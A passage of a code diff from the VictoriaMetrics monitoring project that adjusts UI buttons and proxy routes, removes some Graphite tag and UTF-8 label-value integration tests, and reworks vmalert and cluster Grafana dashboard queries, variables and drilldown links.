||||
color="gray"
|
||||
startIcon={<WikiIcon/>}
|
||||
>
|
||||
Documentation
|
||||
</Button>
|
||||
<WikiIcon/>
|
||||
Documentation
|
||||
</a>
|
||||
<Button
|
||||
variant="outlined"
|
||||
variant="text"
|
||||
onClick={handleRunExample}
|
||||
>
|
||||
Try example
|
||||
@@ -126,7 +118,7 @@ const Relabel: FC = () => {
|
||||
onClick={handleRunQuery}
|
||||
startIcon={<PlayIcon/>}
|
||||
>
|
||||
Preview
|
||||
Submit
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
@@ -33,7 +33,7 @@
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: flex-end;
|
||||
gap: $padding-small;
|
||||
gap: $padding-global;
|
||||
|
||||
a {
|
||||
color: $color-text-secondary;
|
||||
|
||||
@@ -107,20 +107,16 @@ const RetentionFilters: FC = () => {
|
||||
</div>
|
||||
<div className="vm-retention-filters-body-top">
|
||||
<a
|
||||
className="vm-link vm-link_with-icon"
|
||||
target="_blank"
|
||||
href="https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#retention-filters"
|
||||
rel="help noreferrer"
|
||||
>
|
||||
<Button
|
||||
variant="text"
|
||||
color="gray"
|
||||
startIcon={<WikiIcon/>}
|
||||
>
|
||||
Documentation
|
||||
</Button>
|
||||
<WikiIcon/>
|
||||
Documentation
|
||||
</a>
|
||||
<Button
|
||||
variant="outlined"
|
||||
variant="text"
|
||||
onClick={handleRunExample}
|
||||
>
|
||||
Try example
|
||||
@@ -130,7 +126,7 @@ const RetentionFilters: FC = () => {
|
||||
onClick={handleApplyFilters}
|
||||
startIcon={<PlayIcon/>}
|
||||
>
|
||||
Preview
|
||||
Apply
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
@@ -48,7 +48,7 @@ const WithTemplate: FC = () => {
|
||||
type="textarea"
|
||||
label="MetricsQL query after expanding WITH expressions and applying other optimizations"
|
||||
value={data}
|
||||
readonly
|
||||
disabled
|
||||
/>
|
||||
</div>
|
||||
<div className="vm-with-template-body-top">
|
||||
|
||||
@@ -21,7 +21,7 @@ const getProxy = (): Record<string, ProxyOptions> | undefined => {
|
||||
};
|
||||
|
||||
return {
|
||||
"^/prometheus/.*": { ...commonProxy },
|
||||
"^/prometheus/(api|vmalert)/.*": { ...commonProxy },
|
||||
"/prometheus/vmui/config.json": { ...commonProxy },
|
||||
};
|
||||
};
|
||||
|
||||
@@ -33,8 +33,6 @@ type PrometheusQuerier interface {
|
||||
// separate interface or rename this interface to allow for multiple querier
|
||||
// types.
|
||||
GraphiteMetricsIndex(t *testing.T, opts QueryOpts) GraphiteMetricsIndexResponse
|
||||
GraphiteTagsTagSeries(t *testing.T, record string, opts QueryOpts)
|
||||
GraphiteTagsTagMultiSeries(t *testing.T, records []string, opts QueryOpts)
|
||||
}
|
||||
|
||||
// Writer contains methods for writing new data
|
||||
|
||||
@@ -60,60 +60,3 @@ func TestClusterMetricsIndex(t *testing.T) {
|
||||
|
||||
testMetricsIndex(tc.T(), sut)
|
||||
}
|
||||
|
||||
// testTagSeries tests the registration of new time series in index.
|
||||
//
|
||||
// See https://graphite.readthedocs.io/en/stable/tags.html#adding-series-to-the-tagdb.
|
||||
func testTagSeries(tc *apptest.TestCase, sut apptest.PrometheusWriteQuerier, getStorageMetric func(string) int) {
|
||||
t := tc.T()
|
||||
|
||||
assertNewTimeseriesCreatedTotal := func(want int) {
|
||||
tc.Assert(&apptest.AssertOptions{
|
||||
Msg: "unexpected vm_new_timeseries_created_total",
|
||||
Got: func() any {
|
||||
return getStorageMetric("vm_new_timeseries_created_total")
|
||||
},
|
||||
Want: want,
|
||||
})
|
||||
}
|
||||
|
||||
rec := "disk.used;rack=a1;datacenter=dc1;server=web01"
|
||||
sut.GraphiteTagsTagSeries(t, rec, apptest.QueryOpts{})
|
||||
assertNewTimeseriesCreatedTotal(0)
|
||||
|
||||
recs := []string{
|
||||
"metric.yyy;t2=a;t1=b;t3=c",
|
||||
"metric.zzz;t5=d;t4=e;t6=f",
|
||||
"metric.xxx;t8=g;t7=h;t9=i",
|
||||
}
|
||||
sut.GraphiteTagsTagMultiSeries(t, recs, apptest.QueryOpts{})
|
||||
assertNewTimeseriesCreatedTotal(0)
|
||||
}
|
||||
|
||||
func TestSingleTagSeries(t *testing.T) {
|
||||
tc := apptest.NewTestCase(t)
|
||||
defer tc.Stop()
|
||||
|
||||
sut := tc.MustStartDefaultVmsingle()
|
||||
getStorageMetric := func(name string) int {
|
||||
return sut.GetIntMetric(t, name)
|
||||
}
|
||||
|
||||
testTagSeries(tc, sut, getStorageMetric)
|
||||
}
|
||||
|
||||
func TestClusterTagSeries(t *testing.T) {
|
||||
tc := apptest.NewTestCase(t)
|
||||
defer tc.Stop()
|
||||
|
||||
sut := tc.MustStartDefaultCluster()
|
||||
getStorageMetric := func(name string) int {
|
||||
var v int
|
||||
for _, s := range sut.Vmstorages {
|
||||
v += s.GetIntMetric(t, name)
|
||||
}
|
||||
return v
|
||||
}
|
||||
|
||||
testTagSeries(tc, sut, getStorageMetric)
|
||||
}
|
||||
|
||||
@@ -32,8 +32,6 @@ func TestSingleInstantQuery(t *testing.T) {
|
||||
testInstantQueryDoesNotReturnStaleNaNs(t, sut)
|
||||
|
||||
testQueryRangeWithAtModifier(t, sut)
|
||||
|
||||
testLabelValuesWithUTFNames(t, sut)
|
||||
}
|
||||
|
||||
func TestClusterInstantQuery(t *testing.T) {
|
||||
@@ -46,8 +44,6 @@ func TestClusterInstantQuery(t *testing.T) {
|
||||
testInstantQueryDoesNotReturnStaleNaNs(t, sut)
|
||||
|
||||
testQueryRangeWithAtModifier(t, sut)
|
||||
|
||||
testLabelValuesWithUTFNames(t, sut)
|
||||
}
|
||||
|
||||
func testInstantQueryWithUTFNames(t *testing.T, sut apptest.PrometheusWriteQuerier) {
|
||||
@@ -240,46 +236,3 @@ func testQueryRangeWithAtModifier(t *testing.T, sut apptest.PrometheusWriteQueri
|
||||
t.Fatalf("unexpected error: %q", resp.Error)
|
||||
}
|
||||
}
|
||||
|
||||
// This test checks that label values are decoded from UTF-8 according to Prometheus spec.
|
||||
// See https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10446
|
||||
// Spec: https://prometheus.io/docs/prometheus/latest/querying/api/#querying-label-values
|
||||
func testLabelValuesWithUTFNames(t *testing.T, sut apptest.PrometheusWriteQuerier) {
|
||||
|
||||
timestamp := millis("2025-01-01T00:00:00Z")
|
||||
data := prompb.WriteRequest{
|
||||
Timeseries: []prompb.TimeSeries{
|
||||
{
|
||||
Labels: []prompb.Label{
|
||||
{Name: "__name__", Value: "labelvals"},
|
||||
{Name: "kubernetes_something/special&' chars", Value: "漢©®€£"},
|
||||
{Name: "3👋tfにちは", Value: "漢©®€£"},
|
||||
},
|
||||
Samples: []prompb.Sample{
|
||||
{Value: 1, Timestamp: timestamp},
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
sut.PrometheusAPIV1Write(t, data, apptest.QueryOpts{})
|
||||
sut.ForceFlush(t)
|
||||
|
||||
cmpOptions := []cmp.Option{}
|
||||
|
||||
// encoded via prometheus model.EscapeName(string,model.ValueEncodingEscaping)
|
||||
want := map[string][]string{
|
||||
"__name__": {"labelvals"},
|
||||
"U__kubernetes__something_2f_special_26__27__20_chars": {"漢©®€£"},
|
||||
"U___33__1f44b_tf_306b__3061__306f_": {"漢©®€£"},
|
||||
}
|
||||
for labelName, expected := range want {
|
||||
got := sut.PrometheusAPIV1LabelValues(t, labelName, `{__name__="labelvals"}`, apptest.QueryOpts{
|
||||
Start: fmt.Sprintf("%d", timestamp),
|
||||
End: fmt.Sprintf("%d", timestamp),
|
||||
})
|
||||
if diff := cmp.Diff(expected, got.Data, cmpOptions...); diff != "" {
|
||||
t.Errorf("unexpected response (-want, +got):\n%s", diff)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -171,26 +171,6 @@ func TestClusterMultiTenantSelect(t *testing.T) {
|
||||
t.Errorf("unexpected response (-want, +got):\n%s", diff)
|
||||
}
|
||||
|
||||
// /api/v1/label/../value with extra_filters
|
||||
|
||||
wantVR := apptest.NewPrometheusAPIV1LabelValuesResponse(t,
|
||||
`{"data": [
|
||||
"5"
|
||||
]
|
||||
}`)
|
||||
wantSR.Sort()
|
||||
gotVR := vmselect.PrometheusAPIV1LabelValues(t, "vm_account_id", "foo", apptest.QueryOpts{
|
||||
Start: "2022-05-10T08:00:00.000Z",
|
||||
End: "2022-05-10T08:30:00.000Z",
|
||||
ExtraFilters: []string{`{vm_account_id="5"}`},
|
||||
Tenant: "multitenant",
|
||||
})
|
||||
gotSR.Sort()
|
||||
|
||||
if diff := cmp.Diff(wantVR, gotVR, cmpopts.IgnoreFields(apptest.PrometheusAPIV1LabelValuesResponse{}, "Status", "IsPartial")); diff != "" {
|
||||
t.Errorf("unexpected response (-want, +got):\n%s", diff)
|
||||
}
|
||||
|
||||
// Delete series from specific tenant
|
||||
vmselect.APIV1AdminTSDBDeleteSeries(t, "foo_bar", apptest.QueryOpts{
|
||||
Tenant: "5:15",
|
||||
|
||||
@@ -61,8 +61,8 @@ func TestClusterSearchWithDisabledPerDayIndex(t *testing.T) {
|
||||
|
||||
type startSUTFunc func(name string, disablePerDayIndex bool) apptest.PrometheusWriteQuerier
|
||||
|
||||
// testSearchWithDisabledPerDayIndex shows what search results to expect when
|
||||
// data is first inserted with per-day index enabled and then with per-day index
|
||||
// testDisablePerDayIndex_Search shows what search results to expect when data
|
||||
// is first inserted with per-day index enabled and then with per-day index
|
||||
// disabled.
|
||||
//
|
||||
// The data inserted with enabled per-day index must be searchable with disabled
|
||||
@@ -112,8 +112,8 @@ func testSearchWithDisabledPerDayIndex(tc *apptest.TestCase, start startSUTFunc)
|
||||
})
|
||||
}
|
||||
|
||||
// Start SUT with enabled per-day index, insert sample1, and confirm it is
|
||||
// searchable.
|
||||
// Start vmsingle with enabled per-day index, insert sample1, and confirm it
|
||||
// is searchable.
|
||||
sut := start("with-per-day-index", false)
|
||||
sample1 := []string{"metric1 111 1704067200000"} // 2024-01-01T00:00:00Z
|
||||
sut.PrometheusAPIV1ImportPrometheus(t, sample1, apptest.QueryOpts{})
|
||||
@@ -130,8 +130,8 @@ func testSearchWithDisabledPerDayIndex(tc *apptest.TestCase, start startSUTFunc)
|
||||
},
|
||||
})
|
||||
|
||||
// Restart SUT with disabled per-day index, insert sample2, and confirm that
|
||||
// both sample1 and sample2 is searchable.
|
||||
// Restart vmsingle with disabled per-day index, insert sample2, and confirm
|
||||
// that both sample1 and sample2 is searchable.
|
||||
tc.StopPrometheusWriteQuerier(sut)
|
||||
sut = start("without-per-day-index", true)
|
||||
sample2 := []string{"metric2 222 1704067200000"} // 2024-01-01T00:00:00Z
|
||||
@@ -156,8 +156,8 @@ func testSearchWithDisabledPerDayIndex(tc *apptest.TestCase, start startSUTFunc)
|
||||
},
|
||||
})
|
||||
|
||||
// Insert sample1 but for a different date, restart SUT with enabled per-day
|
||||
// index and confirm that:
|
||||
// Insert sample1 but for a different date, restart vmsingle with enabled
|
||||
// per-day index and confirm that:
|
||||
// - sample1 is searchable within the time range of Jan 1st
|
||||
// - sample1 is not searchable within the time range of Jan 20th
|
||||
// - sample1 is searchable within the time range of Jan 1st-20th (because
|
||||
|
||||
@@ -298,14 +298,13 @@ func (app *Vminsert) String() string {
|
||||
func (app *Vminsert) sendBlocking(t *testing.T, numRecordsToSend int, send func()) {
|
||||
t.Helper()
|
||||
|
||||
wantRowsSentCount := app.rpcRowsSentTotal(t) + numRecordsToSend
|
||||
|
||||
send()
|
||||
|
||||
const (
|
||||
retries = 20
|
||||
period = 100 * time.Millisecond
|
||||
)
|
||||
wantRowsSentCount := app.rpcRowsSentTotal(t) + numRecordsToSend
|
||||
for range retries {
|
||||
d := app.rpcRowsSentTotal(t)
|
||||
if d >= wantRowsSentCount {
|
||||
|
||||
@@ -307,37 +307,6 @@ func (app *Vmselect) GraphiteMetricsIndex(t *testing.T, opts QueryOpts) Graphite
|
||||
return index
|
||||
}
|
||||
|
||||
// GraphiteTagsTagSeries is a test helper function that registers Graphite tags
|
||||
// for a single time series by sending a HTTP POST request to
|
||||
// /graphite/tags/tagSeries vmsingle endpoint.
|
||||
func (app *Vmselect) GraphiteTagsTagSeries(t *testing.T, record string, opts QueryOpts) {
|
||||
t.Helper()
|
||||
|
||||
url := fmt.Sprintf("http://%s/select/%s/graphite/tags/tagSeries", app.httpListenAddr, opts.getTenant())
|
||||
values := opts.asURLValues()
|
||||
values.Add("path", record)
|
||||
|
||||
_, statusCode := app.cli.PostForm(t, url, values)
|
||||
if got, want := statusCode, http.StatusNotImplemented; got != want {
|
||||
t.Fatalf("unexpected status code: got %d, want %d", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
func (app *Vmselect) GraphiteTagsTagMultiSeries(t *testing.T, records []string, opts QueryOpts) {
|
||||
t.Helper()
|
||||
|
||||
url := fmt.Sprintf("http://%s/select/%s/graphite/tags/tagMultiSeries", app.httpListenAddr, opts.getTenant())
|
||||
values := opts.asURLValues()
|
||||
for _, rec := range records {
|
||||
values.Add("path", rec)
|
||||
}
|
||||
|
||||
_, statusCode := app.cli.PostForm(t, url, values)
|
||||
if got, want := statusCode, http.StatusNotImplemented; got != want {
|
||||
t.Fatalf("unexpected status code: got %d, want %d", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
// APIV1AdminTenants sends a query to a /admin/tenants endpoint
|
||||
func (app *Vmselect) APIV1AdminTenants(t *testing.T) *AdminTenantsResponse {
|
||||
t.Helper()
|
||||
|
||||
@@ -414,37 +414,6 @@ func (app *Vmsingle) GraphiteMetricsIndex(t *testing.T, _ QueryOpts) GraphiteMet
|
||||
return index
|
||||
}
|
||||
|
||||
// GraphiteTagsTagSeries is a test helper function that registers Graphite tags
|
||||
// for a single time series by sending a HTTP POST request to
|
||||
// /graphite/tags/tagSeries vmsingle endpoint.
|
||||
func (app *Vmsingle) GraphiteTagsTagSeries(t *testing.T, record string, opts QueryOpts) {
|
||||
t.Helper()
|
||||
|
||||
url := fmt.Sprintf("http://%s/graphite/tags/tagSeries", app.httpListenAddr)
|
||||
values := opts.asURLValues()
|
||||
values.Add("path", record)
|
||||
|
||||
_, statusCode := app.cli.PostForm(t, url, values)
|
||||
if got, want := statusCode, http.StatusNotImplemented; got != want {
|
||||
t.Fatalf("unexpected status code: got %d, want %d", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
func (app *Vmsingle) GraphiteTagsTagMultiSeries(t *testing.T, records []string, opts QueryOpts) {
|
||||
t.Helper()
|
||||
|
||||
url := fmt.Sprintf("http://%s/graphite/tags/tagMultiSeries", app.httpListenAddr)
|
||||
values := opts.asURLValues()
|
||||
for _, rec := range records {
|
||||
values.Add("path", rec)
|
||||
}
|
||||
|
||||
_, statusCode := app.cli.PostForm(t, url, values)
|
||||
if got, want := statusCode, http.StatusNotImplemented; got != want {
|
||||
t.Fatalf("unexpected status code: got %d, want %d", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
// APIV1StatusMetricNamesStats sends a query to a /api/v1/status/metric_names_stats endpoint
|
||||
// and returns the statistics response for given params.
|
||||
//
|
||||
|
||||
@@ -31,6 +31,12 @@
|
||||
"id": "table",
|
||||
"name": "Table",
|
||||
"version": ""
|
||||
},
|
||||
{
|
||||
"type": "datasource",
|
||||
"id": "victoriametrics-metrics-datasource",
|
||||
"name": "VictoriaMetrics",
|
||||
"version": "0.16.0"
|
||||
}
|
||||
],
|
||||
"annotations": {
|
||||
@@ -55,7 +61,6 @@
|
||||
}
|
||||
]
|
||||
},
|
||||
"description": "Overview of alerts state in time based on metrics generated by VictoriaMetrics vmalert.",
|
||||
"editable": true,
|
||||
"fiscalYearStartMonth": 0,
|
||||
"graphTooltip": 0,
|
||||
@@ -174,7 +179,7 @@
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "sort_desc(topk_max($topk, sum(vmalert_alerts_firing{job=~\"$job\",instance=~\"$instance\",group=~\"$group\"}) by (alertname)))",
|
||||
"expr": "sort_desc(topk_max($topk, sum(vmalert_alerts_firing{group=~\"$group\"}) by (alertname)))",
|
||||
"format": "time_series",
|
||||
"instant": false,
|
||||
"legendFormat": "__auto",
|
||||
@@ -242,7 +247,7 @@
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "count(count(vmalert_alerting_rules_errors_total{job=~\"$job\",instance=~\"$instance\",group=~\"$group\"}) by (group))",
|
||||
"expr": "count(count(vmalert_alerting_rules_errors_total{group=~\"$group\"}) by (group))",
|
||||
"interval": "",
|
||||
"legendFormat": "",
|
||||
"range": true,
|
||||
@@ -309,7 +314,7 @@
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "count(vmalert_alerting_rules_errors_total{job=~\"$job\",instance=~\"$instance\",group=~\"$group\"})",
|
||||
"expr": "count(vmalert_alerting_rules_errors_total{group=~\"$group\"})",
|
||||
"instant": false,
|
||||
"interval": "",
|
||||
"legendFormat": "",
|
||||
@@ -398,7 +403,7 @@
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "topk_max(100, sum(increases_over_time(vmalert_alerts_firing{job=~\"$job\",instance=~\"$instance\",group=~\"$group\"}[$__range])) by(group, alertname) > 0)",
|
||||
"expr": "topk_max(100, sum(increases_over_time(vmalert_alerts_firing{group=~\"$group\"}[$__range])) by(group, alertname) > 0)",
|
||||
"format": "table",
|
||||
"instant": true,
|
||||
"key": "Q-3934f0fb-8ad6-4519-a98d-c26d0fc6b312-0",
|
||||
@@ -501,24 +506,6 @@
|
||||
"value": 200
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"matcher": {
|
||||
"id": "byName",
|
||||
"options": "Alert"
|
||||
},
|
||||
"properties": [
|
||||
{
|
||||
"id": "links",
|
||||
"value": [
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Alert",
|
||||
"url": "/alerting/${ds:text}/${__value.text}/find"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
@@ -551,7 +538,7 @@
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "topk_max($topk, sum(increases_over_time(vmalert_alerts_firing{job=~\"$job\",instance=~\"$instance\",group=~\"$group\"}[$__range])) by (group, alertname) > 0)",
|
||||
"expr": "topk_max($topk, sum(increases_over_time(vmalert_alerts_firing{group=~\"$group\"}[$__range])) by (group, alertname) > 0)",
|
||||
"format": "table",
|
||||
"instant": true,
|
||||
"key": "Q-3934f0fb-8ad6-4519-a98d-c26d0fc6b312-0",
|
||||
@@ -603,46 +590,6 @@
|
||||
"regex": "",
|
||||
"type": "datasource"
|
||||
},
|
||||
{
|
||||
"allValue": ".*",
|
||||
"current": {},
|
||||
"datasource": {
|
||||
"type": "prometheus",
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"definition": "label_values(vm_app_version{version=~\"^vmalert.*\"},job)",
|
||||
"includeAll": true,
|
||||
"multi": true,
|
||||
"name": "job",
|
||||
"options": [],
|
||||
"query": {
|
||||
"query": "label_values(vm_app_version{version=~\"^vmalert.*\"},job)",
|
||||
"refId": "StandardVariableQuery"
|
||||
},
|
||||
"refresh": 1,
|
||||
"regex": "",
|
||||
"type": "query"
|
||||
},
|
||||
{
|
||||
"allValue": ".*",
|
||||
"current": {},
|
||||
"datasource": {
|
||||
"type": "prometheus",
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"definition": "label_values(vm_app_version{job=~\"$job\"},instance)",
|
||||
"includeAll": true,
|
||||
"multi": true,
|
||||
"name": "instance",
|
||||
"options": [],
|
||||
"query": {
|
||||
"query": "label_values(vm_app_version{job=~\"$job\"},instance)",
|
||||
"refId": "StandardVariableQuery"
|
||||
},
|
||||
"refresh": 1,
|
||||
"regex": "",
|
||||
"type": "query"
|
||||
},
|
||||
{
|
||||
"allValue": ".*",
|
||||
"current": {},
|
||||
@@ -712,4 +659,4 @@
|
||||
"uid": "ehXxUsGSk",
|
||||
"version": 1,
|
||||
"weekStart": ""
|
||||
}
|
||||
}
|
||||
|
||||
@@ -91,26 +91,8 @@
|
||||
"type": "row"
|
||||
},
|
||||
{
|
||||
"datasource": {
|
||||
"type": "prometheus",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"fieldConfig": {
|
||||
"defaults": {
|
||||
"color": {
|
||||
"mode": "thresholds"
|
||||
},
|
||||
"mappings": [],
|
||||
"thresholds": {
|
||||
"mode": "absolute",
|
||||
"steps": [
|
||||
{
|
||||
"color": "green",
|
||||
"value": 0
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"defaults": {},
|
||||
"overrides": []
|
||||
},
|
||||
"gridPos": {
|
||||
@@ -121,42 +103,17 @@
|
||||
},
|
||||
"id": 24,
|
||||
"options": {
|
||||
"colorMode": "value",
|
||||
"graphMode": "none",
|
||||
"justifyMode": "auto",
|
||||
"orientation": "auto",
|
||||
"percentChangeColorMode": "standard",
|
||||
"reduceOptions": {
|
||||
"calcs": [
|
||||
"lastNotNull"
|
||||
],
|
||||
"fields": "/^short_version$/",
|
||||
"values": false
|
||||
"code": {
|
||||
"language": "plaintext",
|
||||
"showLineNumbers": false,
|
||||
"showMiniMap": false
|
||||
},
|
||||
"showPercentChange": false,
|
||||
"textMode": "value",
|
||||
"wideLayout": true
|
||||
"content": "<div style=\"text-align: center;\">$version</div>",
|
||||
"mode": "markdown"
|
||||
},
|
||||
"pluginVersion": "12.3.0",
|
||||
"targets": [
|
||||
{
|
||||
"datasource": {
|
||||
"type": "prometheus",
|
||||
"uid": "$ds"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"exemplar": false,
|
||||
"expr": "vm_app_version{job=~\"$job\",instance=~\"$instance\"}",
|
||||
"format": "table",
|
||||
"instant": true,
|
||||
"interval": "",
|
||||
"legendFormat": "{{short_version}}",
|
||||
"range": false,
|
||||
"refId": "A"
|
||||
}
|
||||
],
|
||||
"title": "Version",
|
||||
"type": "stat"
|
||||
"type": "text"
|
||||
},
|
||||
{
|
||||
"datasource": {
|
||||
|
||||
@@ -1521,7 +1521,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=203&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=203&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1650,12 +1650,12 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - RSS memory usage",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=189&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=189&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
},
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown - Memory usage breakdown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=225&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=225&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1770,7 +1770,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -1888,7 +1888,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5077,7 +5077,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=224&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=224&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -5129,7 +5129,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job)",
|
||||
"legendFormat": "__auto",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
@@ -6107,7 +6107,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_storage&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_storage&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6257,7 +6257,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_storage&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_storage&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -6908,7 +6908,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=200&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=200&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -7178,7 +7178,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=201&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=201&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -8042,7 +8042,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_select&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_select&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -8186,7 +8186,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_select&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_select&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -9375,7 +9375,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_insert&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=192&var-job=$job_insert&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -9519,7 +9519,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_insert&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/oS7Bi_0Wz?viewPanel=190&var-job=$job_insert&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
"mappings": [],
|
||||
@@ -11153,7 +11153,7 @@
|
||||
"uid": "${ds}"
|
||||
},
|
||||
"editorMode": "code",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance) > 0",
|
||||
"expr": "sum(rate(process_major_pagefaults_total{job=~\"$job\", instance=~\"$instance\"}[$__rate_interval])) by (job,instance)",
|
||||
"legendFormat": "{{instance}} ({{job}})",
|
||||
"range": true,
|
||||
"refId": "A"
|
||||
|
||||
@@ -1521,7 +1521,7 @@
|
||||
{
|
||||
"targetBlank": true,
|
||||
"title": "Drilldown",
|
||||
"url": "/d/wNf0q_kZk?viewPanel=154&var-job=${__field.labels.job}&var-ds=$ds&${__url_time_range}"
|
||||
"url": "/d/wNf0q_kZk?viewPanel=154&var-job=${__field.labels.job}&var-ds=$ds&var-instance=$instance&${__url_time_range}"
|
||||
}
|
||||
],
|
||||
